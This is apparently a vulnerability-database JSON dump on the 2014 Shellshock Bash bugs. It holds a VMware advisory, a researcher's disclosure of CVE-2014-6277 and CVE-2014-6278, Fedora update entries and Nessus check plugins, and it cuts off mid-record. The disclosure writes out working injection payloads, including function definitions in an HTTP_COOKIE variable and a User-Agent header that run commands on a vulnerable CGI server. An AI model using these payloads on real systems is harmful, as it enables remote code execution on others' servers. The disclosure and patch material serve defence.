"\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nVMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2014-0010\r\nSynopsis: VMware product updates address critical Bash \r\n security vulnerabilities\r\nIssue date: 2014-09-30\r\nUpdated on: 2014-09-30 (Initial Advisory)\r\nCVE numbers: CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, \r\n CVE-2014-7187\r\n- ------------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n VMware product updates address Bash security vulnerabilities.\r\n\r\n2. Relevant Releases (Affected products for which remediation is present)\r\n\r\n vCenter Log Insight 2.0\r\n\r\n3. Problem Description \r\n\r\n a. Bash update for multiple products.\r\n\r\n Bash libraries have been updated in multiple products to resolve \r\n multiple critical security issues, also referred to as Shellshock.\r\n \r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the identifiers CVE-2014-6271, CVE-2014-7169, \r\n CVE-2014-7186, and CVE-2014-7187 to these issues.\r\n\r\n VMware products have been grouped into the following four\r\n product categories:\r\n \r\n I) ESXi and ESX Hypervisor\r\n ESXi is not affected because ESXi uses the Ash shell (through\r\n busybox), which is not affected by the vulnerability reported\r\n for the Bash shell.\r\n ESX has an affected version of the Bash shell. See table 1 for\r\n remediation for ESX.\r\n \r\n II) Windows-based products\r\n Windows-based products, including all versions of vCenter Server \r\n running on Windows, are not affected.\r\n\r\n III) VMware (virtual) appliances\r\n VMware (virtual) appliances ship with an affected version of Bash. \r\n See table 2 for remediation for appliances.\r\n \r\n IV) Products that run on Linux, Android, OSX or iOS (excluding\r\nvirtual\r\n appliances)\r\n\r\n Products that run on Linux, Android, OSX or iOS (excluding \r\n virtual appliances) might use the Bash shell that is part of the\r\n operating system. If the operating system has a vulnerable\r\n version of Bash, the Bash security vulnerability might be\r\n exploited through the product. VMware recommends that customers\r\n contact their operating system vendor for a patch. \r\n \r\n MITIGATIONS\r\n\r\n VMware encourages restricting access to appliances through\r\n firewall rules and other network layer controls to only trusted IP\r\n addresses. This measure will greatly reduce any risk to these\r\n appliances.\r\n\r\n RECOMMENDATIONS\r\n\r\n VMware recommends customers evaluate and deploy patches for\r\n affected products in Table 1 and 2 below as these\r\n patches become available. \r\n\r\n Column 4 of the following tables lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n Table 1 - ESXi and ESX Hypervisor\r\n =================================\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch \r\n ============== ======= ======= =============\r\n ESXi any ESXi Not affected\r\n\r\n ESX 4.1 ESX Patch pending *\r\n\r\n ESX 4.0 ESX Patch pending *\r\n\r\n * VMware will make VMware ESX 4.0 and 4.1 security patches available \r\n for the Bash shell vulnerability. This security patch release is an \r\n exception to the existing VMware lifecycle policy. \r\n\r\n Table 2 - Products that are shipped as a (virtual) appliance. \r\n =============================================================\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch \r\n ============== ======= ======= =============\r\n \r\n vCenter Server Appliance 5.x Linux Patch Pending\r\n Horizon DaaS Platform 6.x Linux Patch Pending\r\n Horizon Workspace 1.x, 2.x Linux Patch Pending\r\n IT Business Management Suite 1.x Linux Patch Pending\r\n NSX for Multi-Hypervisor 4.x Linux Patch Pending\r\n NSX for vSphere 6.x Linux Patch Pending\r\n NVP 3.x Linux Patch Pending\r\n vCenter Converter Standalone 5.x Linux Patch Pending \r\n vCenter Hyperic Server 5.x Linux Patch Pending\r\n vCenter Infrastructure Navigator 5.x Linux Patch Pending\r\n vCenter Log Insight 1.x, 2.x Linux 2.0 U1\r\n vCenter Operations Manager 5.x Linux Patch Pending\r\n vCenter Orchestrator Appliance 4.x, 5.x Linux Patch Pending\r\n vCenter Site Recovery Manager 5.x Linux Patch Pending\r\n**\r\n vCenter Support Assistant 5.x Linux Patch Pending\r\n vCloud Automation Center 6.x Linux Patch Pending\r\n vCloud Automation Center\r\n Application Services 6.x Linux Patch Pending\r\n vCloud Director Appliance 5.x Linux Patch Pending\r\n vCloud Connector 2.x Linux Patch Pending\r\n vCloud Networking and Security 5.x Linux Patch Pending\r\n vCloud Usage Meter 3.x Linux Patch Pending\r\n vFabric Application Director 5.x, 6.x Linux Patch Pending\r\n vFabric Postgres 9.x Linux Patch Pending\r\n Viewplanner 3.x Linux Patch Pending\r\n VMware Application Dependency \r\n Planner x.x Linux Patch Pending\r\n VMware Data Recovery 2.x Linux Patch Pending\r\n VMware HealthAnalyzer 5.x Linux Patch Pending\r\n VMware Mirage Gateway 5.x Linux Patch Pending\r\n VMware Socialcast On Premise x.x Linux Patch Pending\r\n VMware Studio 2.x Linux Patch Pending\r\n VMware TAM Data Manager x.x Linux Patch Pending\r\n VMware Workbench 3.x Linux Patch Pending\r\n vSphere App HA 1.x Linux Patch Pending\r\n vSphere Big Data Extensions 1.x, 2.x Linux Patch Pending\r\n vSphere Data Protection 5.x Linux Patch Pending\r\n vSphere Management Assistant 5.x Linux Patch Pending\r\n vSphere Replication 5.x Linux Patch Pending\r\n vSphere Storage Appliance 5.x Linux Patch Pending\r\n\r\n ** This product includes Virtual Appliances that will be updated, the\r\nproduct \r\n itself is not a Virtual Appliance.\r\n\r\n 4. Solution\r\n\r\n vCenter Log Insight\r\n ----------------------------\r\n Downloads:\r\n https://www.vmware.com/go/download-vcenter-log-insight\r\n (click Go to Downloads)\r\n Documentation:\r\n http://kb.vmware.com/kb/2091065\r\n\r\n5. References\r\n \r\n VMware Knowledge Base Article 2090740\r\n http://kb.vmware.com/kb/2090740\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 , \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n6. Change Log\r\n\r\n 2014-09-30 VMSA-2014-0010\r\n Initial security advisory in conjunction with the release of\r\n vCenter Log Insight 2.0 U1 on 2014-09-30.\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n \r\n7. Contact\r\n\r\n E-mail list for product security notifications and announcements:\r\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\n This Security Advisory is posted to the following lists:\r\n\r\n security-announce at lists.vmware.com\r\n bugtraq at securityfocus.com\r\n fulldisclosure at seclists.org\r\n\r\n E-mail: security at vmware.com\r\n PGP key at: http://kb.vmware.com/kb/1055\r\n\r\n VMware Security Advisories\r\n http://www.vmware.com/security/advisories\r\n\r\n VMware Security Response Policy\r\n https://www.vmware.com/support/policies/security_response.html\r\n\r\n VMware Lifecycle Policy\r\n https://www.vmware.com/support/policies/lifecycle.html\r\n \r\n Twitter\r\n https://twitter.com/VMwareSRC\r\n\r\n Copyright 2014 VMware Inc. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: Encryption Desktop 10.3.2 (Build 15337)\r\nCharset: utf-8\r\n\r\nwj8DBQFUK2DqDEcm8Vbi9kMRAg4rAJ9wKbbbxeD3cagCry7GGfR4fVLpDwCeMqYm\r\nSfX/140WMvqvcmkPX2chR9s=\r\n=1KVR\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-05T00:00:00", "title": "NEW VMSA-2014-0010 - VMware product updates address critical Bash security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31131", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31131", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\nGood morning! This is kinda long.\r\n\r\n== Background ==\r\n\r\nIf you are not familiar with the original bash function export\r\nvulnerability (CVE-2014-6271), you may want to have a look at this\r\narticle:\r\n\r\nhttp://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html\r\n\r\nWell, long story short: the initial maintainer-provided patch for this\r\nissue [1] (released on September 24) is *conclusively* broken.\r\n\r\nAfter nagging people to update for a while [5] [7], I wanted to share\r\nthe technical details of two previously non-public issues which may be\r\nused to circumvent the original patch: CVE-2014-6277 and\r\nCVE-2014-6278.\r\n\r\nNote that the issues discussed here are separate from the three\r\nprobably less severe problems publicly disclosed earlier on: Tavis'\r\nlimited-exploitability EOL bug (CVE-2014-7169) and two likely\r\nnon-exploitable one-off issues found by Florian Weimer and Todd Sabin\r\n(CVE-2014-7186 and CVE-2014-7187).\r\n\r\n== Required actions ==\r\n\r\nIf you have installed just the September 24 patch [1], or that and the\r\nfollow-up September 26 patch for CVE-2014-7169 [2], you are likely\r\nstill vulnerable to RCE and need to update ASAP, as discussed in [5].\r\n\r\nYou are safe if you have installed the unofficial function prefix\r\npatch from Florian Weimer [3], or its upstream variant released on\r\nSeptember 28 [4]. The patch does not eliminate the problems, but\r\nshields the underlying parser from untrusted inputs under normal\r\ncircumstances.\r\n\r\nNote: over the past few days, Florian's patch has been picked up by\r\nmajor Linux distros (Red Hat, Debian, SUSE, etc), so there is a\r\nreasonable probability that you are in good shape. To test, execute\r\nthis command from within a bash shell:\r\n\r\nfoo='() { echo not patched; }' bash -c foo\r\n\r\nIf you see "not patched", you probably want upgrade immediately. If\r\nyou see "bash: foo: command not found", you're OK.\r\n\r\n== Vulnerability details: CVE-2014-6277 (the more involved one) ==\r\n\r\nThe following function definition appearing in the value of any\r\nenvironmental variable passed to bash will lead to an attempt to\r\ndereference attacker-controlled pointers (provided that the targeted\r\ninstance of bash is protected only with the original patches [1][2]\r\nand does not include Florian's fix):\r\n\r\n() { x() { _; }; x() { _; } <<a; }\r\n\r\nA more complete example leading to a deref of 0x41414141 would be:\r\n\r\nHTTP_COOKIE="() { x() { _; }; x() { _; } <<`perl -e '{print\r\n"A"x1000}'`; }" bash -c :\r\n\r\nbash[25662]: segfault at 41414141 ip 00190d96 sp bfbe6354 error 4 in\r\nlibc-2.12.so[110000+191000]\r\n\r\n(If you are seeing 0xdfdfdfdf, see note later on).\r\n\r\nThe issue is caused by an uninitialized here_doc_eof field in a REDIR\r\nstruct originally created in make_redirection(). The initial segv will\r\nhappen due to an attempt to read and then copy a string to a new\r\nbuffer through a macro that expands to:\r\n\r\nstrcpy (xmalloc (1 + strlen (redirect->here_doc_eof)), (redirect->here_doc_eof))\r\n\r\nThis appears to be exploitable in at least one way: if here_doc_eof is\r\nchosen by the attacker to point in the vicinity of the current stack\r\npointer, the apparent contents of the string - and therefore its\r\nlength - may change between stack-based calls to xmalloc() and\r\nstrcpy() as a natural consequence of an attempt to pass parameters and\r\ncreate local variables. Such a mid-macro switch will result in an\r\nout-of-bounds write to the newly-allocated memory.\r\n\r\nA simple conceptual illustration of this attack vector would be:\r\n\r\n-- snip! --\r\nchar* result;\r\nint len_alloced;\r\n\r\nmain(int argc, char** argv) {\r\n\r\n /* The offset will be system- and compiler-specific */;\r\n char* ptr = &ptr - 9;\r\n\r\n result = strcpy (malloc(100 + (len_alloced = strlen(ptr))), ptr);\r\n\r\n printf("requested memory = %d\n"\r\n "copied text = %d\n", len_alloced + 1, strlen(result) + 1);\r\n\r\n}\r\n-- snip! --\r\n\r\nWhen compiled with the -O2 flag used for bash, on one test system,\r\nthis produces:\r\n\r\nrequested memory = 2\r\ncopied text = 28\r\n\r\nThis can lead to heap corruption, with multiple writes possible per\r\npayload by simply increasing the number of malformed here-docs. The\r\nconsequences should be fairly clear.\r\n\r\n[ There is also a latter call to free() on here_doc_eof in\r\ndispose_cmd.c, but because of the simultaneous discovery of the much\r\nsimpler bug '78 discussed in the next section, I have not spent a\r\nwhole lot of time trying to figure out how to get to that path. ]\r\n\r\nPerhaps notably, the ability to specify attacker-controlled addresses\r\nhinges on the state of --enable-bash-malloc and --enable-mem-scramble\r\ncompile-time flags; if both are enabled, the memory returned by\r\nxmalloc() will be initialized to 0xdf, making the prospect of\r\nexploitation more speculative (essentially depending on whether the\r\nstack or any other memory region can be grown to overlap with\r\n0xdfdfdfdf). That said, many Linux distributions disable one or both\r\nflags and are vulnerable out-of-the-box. It is also of note that\r\nrelatively few distributions compile bash as PIE, so there is little\r\nconsolation to be found in ASLR.\r\n\r\nSimilarly to the original vulnerability, this issue can be usually\r\ntriggered remotely through web servers such as Apache (provided that\r\nthey invoke CGI scripts or PHP / Python / Perl / C / Java servlets\r\nthat rely on system() or popen()-type libcalls); through DHCP clients;\r\nand through some MUAs and MTAs. For a more detailed discussion of the\r\nexposed attack surface, refer to [6].\r\n\r\n== Vulnerability details: CVE-2014-6278 (the "back to the '90s" one) ==\r\n\r\nThe following function definition appearing in the value of any\r\nenvironmental variable passed to bash 4.2 or 4.3 will lead to\r\nstraightforward put-your-command-here RCE (again, provided that the\r\ntargeted instance is not protected with Florian's patch):\r\n\r\n() { _; } >_[$($())] { echo hi mom; id; }\r\n\r\nA complete example looks like this:\r\n\r\nHTTP_COOKIE='() { _; } >_[$($())] { echo hi mom; id; }' bash -c :\r\n\r\n...or:\r\n\r\nGET /some/script.cgi HTTP/1.0\r\nUser-Agent: () { _; } >_[$($())] { id >/tmp/hi_mom; }\r\n\r\nNote that the PoC does not work as-is in more ancient versions of\r\nbash, such as 2.x or 3.x; it might have been introduced with\r\nxparse_dolparen() starting with bash 4.2 patch level 12 few years\r\nback, but I have not investigated this in a lot of detail. Florian's\r\npatch is strongly recommended either way.\r\n\r\nThe attack surface through which this flaw may be triggered is roughly\r\nsimilar to that for CVE-2014-6277 and the original bash bug [6].\r\n\r\n== Additional info ==\r\n\r\nBoth of these issues were identified in an automated fashion with\r\namerican fuzzy lop:\r\n\r\nhttps://code.google.com/p/american-fuzzy-lop\r\n\r\nThe out-of-the-box fuzzer was seeded with a minimal valid function\r\ndefinition ("() { foo() { foo; }; >bar; }") and allowed to run for a\r\ncouple of hours on a single core.\r\n\r\nIn addition to the issues discussed above, the fuzzer also hit three\r\nof the four previously-reported CVEs.\r\n\r\nI initially shared the findings privately with vendors, but because of\r\nthe intense scrutiny that this codebase is under, the ease of\r\nreproducing these results with an open-source fuzzer, and the\r\nnow-broad availability of upstream mitigations, there seems to be\r\nrelatively little value in continued secrecy.\r\n\r\n== References ==\r\n\r\n[1] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025\r\n[2] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-026\r\n[3] http://www.openwall.com/lists/oss-security/2014/09/25/13\r\n[4] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027\r\n[5] http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html\r\n[6] http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html\r\n[7] http://www.pcworld.com/article/2688932/improved-patch-tackles-new-shellshock-attack-vectors.html\r\n\r\nPS. There are no other bugs in bash.\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-05T00:00:00", "title": "the other bash RCEs (CVE-2014-6277 and CVE-2014-6278)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31129", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31129", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. ", "edition": 2, "cvss3": {}, "published": "2014-10-05T08:13:46", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: bash-4.2.51-2.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-10-05T08:13:46", "id": "FEDORA:652DB21498", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. ", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-26T09:03:00", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-26T09:03:00", "id": "FEDORA:6FC4121113", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. ", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-27T10:08:26", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: bash-4.3.25-2.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-27T10:08:26", "id": "FEDORA:4A9CF241E0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "description": "The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification. ", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-26T09:00:48", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: bash-4.2.48-2.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-26T09:00:48", "id": "FEDORA:9FE1722338", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-04-16T14:09:59", "description": "New bash packages are available for Slackware 13.0 to fix a security issue.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Slackware 13.0 : bash (rebuild for Slackware 13.0 only) (SSA:2014-268-02)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:bash", "cpe:/o:slackware:slackware_linux:13.0"], "id": "SLACKWARE_SSA_2014-268-02.NASL", "href": "https://www.tenable.com/plugins/nessus/77878", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2014-268-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77878);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"SSA\", value:\"2014-268-02\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Slackware 13.0 : bash (rebuild for Slackware 13.0 only) (SSA:2014-268-02)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"New bash packages are available for Slackware 13.0 to fix a security\nissue.\");\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.309194\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?45f8fb5f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"i486\", pkgnum:\"3_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"x86_64\", pkgnum:\"3_slack13.0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:10:01", "description": "Description of changes:\n\n[3.2-33.1.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : bash (ELSA-2014-3077)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2014-3077.NASL", "href": "https://www.tenable.com/plugins/nessus/77893", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3077.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77893);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 5 : bash (ELSA-2014-3077)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[3.2-33.1.0.1]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004483.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = 